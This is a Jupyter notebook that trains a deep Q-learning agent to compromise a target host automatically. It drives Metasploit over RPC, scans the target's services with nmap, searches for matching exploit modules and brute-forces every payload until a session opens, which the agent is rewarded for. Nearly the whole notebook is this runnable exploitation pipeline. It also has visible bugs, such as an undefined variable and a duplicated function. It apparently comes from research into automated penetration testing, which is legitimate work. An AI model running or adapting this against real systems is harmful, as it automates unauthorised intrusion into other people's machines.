# Deep Q-learning

In [None]:
import numpy as np
import gym
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.metrics import mean_squared_error

from pymetasploit3.msfrpc import *
import nmap3
import inspect
import nmap3
import lxml
import json
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
import random
import re
import time
from matplotlib import pyplot as plt
import sys

In [None]:
class DQNAgent:
    def __init__(self, state_size, action_size):
        self.n_actions = action_size
        # we define some parameters and hyperparameters:
        # "lr" : learning rate
        # "gamma": discounted factor
        # "exploration_proba_decay": decay of the exploration probability
        # "batch_size": size of experiences we sample to train the DNN
        self.lr = 0.001
        self.gamma = 0.99
        self.exploration_proba = 0.8
        self.exploration_proba_decay = 0.005
        self.batch_size = 32
        
        # We define our memory buffer where we will store our experiences
        # We stores only the 2000 last time steps
        self.memory_buffer= list()
        self.max_memory_buffer = 2000
        
        # We creaate our model having to hidden layers of 24 units (neurones)
        # The first layer has the same size as a state size
        # The last layer has the size of actions space
        self.model = Sequential([
            Dense(units=24,input_dim=state_size, activation = 'relu'),
            Dense(units=24,activation = 'relu'),
            Dense(units=action_size, activation = 'linear')
        ])
        self.model.compile(loss="mse",
                      optimizer = Adam(lr=self.lr))
        
    # The agent computes the action to perform given a state 
    def compute_action(self, current_state):
        # We sample a variable uniformly over [0,1]
        # if the variable is less than the exploration probability
        #     we choose an action randomly
        # else
        #     we forward the state through the DNN and choose the action 
        #     with the highest Q-value.
        if np.random.uniform(0,1) < self.exploration_proba:
            return np.random.choice(range(self.n_actions))
        q_values = self.model.predict(current_state)[0]
        return np.argmax(q_values)

    # when an episode is finished, we update the exploration probability using 
    # espilon greedy algorithm
    def update_exploration_probability(self):
        self.exploration_proba = self.exploration_proba * np.exp(-self.exploration_proba_decay)
        print(self.exploration_proba)
    
    # At each time step, we store the corresponding experience
    def store_episode(self,current_state, action, reward, done):
        #We use a dictionnary to store them
        self.memory_buffer.append({
            "current_state":current_state,
            "action":action,
            "reward":reward,
            "done" :done
        })
        # If the size of memory buffer exceeds its maximum, we remove the oldest experience
        if len(self.memory_buffer) > self.max_memory_buffer:
            self.memory_buffer.pop(0)
    

    # At the end of each episode, we train our model
    def train(self, batch_size):
        # We shuffle the memory buffer and select a batch size of experiences
        np.random.shuffle(self.memory_buffer)
        batch_sample = self.memory_buffer[0:self.batch_size]
        
        # We iterate over the selected experiences
        for experience in batch_sample:
            # We compute the Q-values of S_t
            q_current_state = self.model.predict(experience["current_state"])
            # We compute the Q-target using Bellman optimality equation
            q_target = experience["reward"]
            q_current_state[0][experience["action"]] = q_target
            # train the model
            self.model.fit(experience["current_state"], q_current_state, verbose=0)
    
    def load(self, name):
        self.model.load_weights(name)

    def save(self, name):
        self.model.save_weights(name)

# Environment

In [None]:
def state_loading(state):
    if state == "end":
        return state
    state_in_string = ""
    state_in_string = str(state[0]) + ' ' + str(state[2]) + ' ' +  str(state[3])
    filted_state = state_in_string.replace('None', '')
    return filted_state

def load_all_exploit():
    new_module_list = []
    for x in client.modules.exploits:
        module = 'exploit/' + x
        new_module_list.append(module)
    return new_module_list

def load_all_auxiliary():
    new_module_list = []
    for x in client.modules.auxiliary:
        module = 'auxiliary/' + x
        new_module_list.append(module)
    return new_module_list

# search target service return with a service list

def load_all_auxiliary():
    new_module_list = []
    for x in client.modules.auxiliary:
        module = 'auxiliary/' + x
        new_module_list.append(module)
    return new_module_list

# search target service return with a service list
def search_service(ip):
    nmap = nmap3.Nmap()
    version_result = nmap.nmap_version_detection(ip)
    result = []
    for x in version_result[target]["ports"]:
        result.append([x.get('service').get('name'), x.get('portid'), x.get('service').get('product'), x.get('service').get('version')])
    return result

# kill all session, destroy console and set state to init
def reset():
    global console_cid
    client.consoles.console(console_cid).write('sessions -K')
    state = 'init'

#check the action seccss create a session
def check_success():
    success = False
    session = client.sessions.list.keys()
    if len(session) != 0:
        success = True
        client.consoles.console(console_cid).write('sessions -K')
    return success

# fill parameter of the exploit module
def fill_requirement(exploit):
    filled_exploit = exploit
    for x in exploit.missing_required:
        if x == 'RHOSTS':
            filled_exploit['RHOSTS'] = target
        if x == 'RHOST':
            filled_exploit['RHOST'] = target
    return filled_exploit

# execute the exploit module with brute force the payload
def perform_action(action):
    action_list = load_all_exploit()
    choose = action_list[action]
    print (choose)
    if 'exploit' in choose:
        exploit = client.modules.use('exploit', choose)
        filled_exploit = fill_requirement(exploit)
        for x in filled_exploit.targetpayloads():
            try:
                filled_exploit.execute(payload=x)
            except Exception:
                print ('Payload Exception:', Exception)
                pass
    if 'auxiliary' in choose:
        exploit = client.modules.use('auxiliary', choose)
        exploit.execute()
        
# load all the possible action (modules) about the service        
def load_action_set(service):
    global console_cid
    pattern = re.compile(r'\bexploit\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80}', flags=re.I | re.X)
    #pattern = re.compile(r'(\bauxiliary\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80}|\bexploit\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80})', flags=re.I | re.X)
    result = []
    search_vairable = service[2]
    if search_vairable == None:
        search_vairable = service[0]
    if '/' in search_vairable:
        multi_vairable = search_vairable.split("/")
        for x in multi_vairable:
            command = 'search ' + x
            client.consoles.console(console_cid).write(command)
            x = client.consoles.console(console_cid).read()
            result = result + pattern.findall(x['data'])
    else:
        command = 'search ' + search_vairable
        client.consoles.console(console_cid).write(command)
        x = client.consoles.console(console_cid).read()
        result = pattern.findall(x['data'])
    return result

def encode_state(states):
    encoded = []
    for x in states:
        encoded.append(hash(x))
    return encoded

In [None]:
client = MsfRpcClient('1234', port=55553, server='172.18.0.7')

In [None]:
target = '172.18.0.9'
all_action = load_all_exploit()# + load_all_auxiliary()
console_cid = client.consoles.console().cid

env_state = 'init'
env_current_action_set = []
env_all_target_service = []
env_action_set = []
env_reward = 0
env_chech_exploit = False

def env_step(action):
    global env_state
    global env_action_set
    global env_all_target_service
    global env_reward
    global target
    
    Done = False
    state_count = 0
    track_state = ""
    
    if env_state == 'init':
        env_all_target_service = search_service(target)
        if len(env_all_target_service) > 1:
            env_state = env_all_target_service.pop(np.random.choice(len(env_all_target_service)-1))
            print(env_state)
        elif len(env_all_target_service) == 1:
            env_state = env_all_target_service.pop()
        else:
            env_state = [hash("end")]

    if action != '':
        perform_action(action)
        if action in env_action_set:
            env_action_set.remove(action)

    chech_exploit = check_success()
        
    # reward function
    if chech_exploit == True:
        Done = True
        env_reward = 100
        print ('Exploited: ', state_loading(env_state), action, env_reward)
        if len(env_all_target_service) > 1:
            env_state = env_all_target_service.pop(np.random.choice(len(env_all_target_service)-1))
            print(env_state)
        elif len(env_all_target_service) == 1:
            env_state = env_all_target_service.pop()
        else:
            env_state = 'end'
        chech_exploit = False
    elif chech_exploit == False:
        env_reward = -10
    else:
        env_reward = 0
        
    if track_state == state_loading(env_state):
        if statecount > 10:
            if len(env_all_target_service) > 1:
                env_state = env_all_target_service.pop(np.random.choice(len(env_all_target_service)-1))
                env_action_set = load_action_set(env_state)
            elif len(env_all_target_service) == 1:
                env_state = env_all_target_service.pop()
            else:
                env_state = 'end'
        else:
            state_count += 1
    else:
        track_state = state_loading(env_state)
        
    return env_reward, Done, encode_state(env_state)

In [None]:
acumulate_reward_list = []

def RunRL():
    state_size = 4
    action_size = len(load_all_exploit())
    agent = DQNAgent(state_size, action_size)
    agent.load("DeepQmodel")
    state = [hash("Empty State"),hash("Empty State") , hash("Empty State"), hash("Empty State")]
    reward = 0
    done = False
    state = np.array([state])
    batch_size = 32
    
    global acumulate_reward_list
    rewards = 0
    total_steps = 0
    
    reset()
    
    try:
        while total_steps < 300:
            total_steps = total_steps + 1
            action = agent.compute_action(state)
        
            agent.store_episode(state, action, reward, done)
        
            reward, done, state = env_step(action)
        
            state = np.array([state])
        
            rewards = rewards + reward
            acumulate_reward_list.append(rewards)
        
            if done:
                agent.update_exploration_probability()
                agent.save("DeepQmodel")
                print ("Save")
            
            if total_steps >= batch_size:
                agent.train(batch_size)
                agent.save("DeepQmodel")
        
            if hash("end") in state:
                print('Finish of Testing')
                break
        return
    
    except:
        agent.save("DeepQmodel")
        e = sys.exc_info()[0]
        print("Error: %s" % e )

In [None]:
RunRL()

In [None]:
plt.plot(acumulate_reward_list)
plt.xlabel("step")
plt.ylabel("reward")
plt.show()